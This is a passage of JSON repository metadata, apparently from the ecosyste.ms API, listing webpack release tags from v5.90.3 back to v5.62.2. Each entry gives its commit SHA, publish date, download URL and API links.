tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/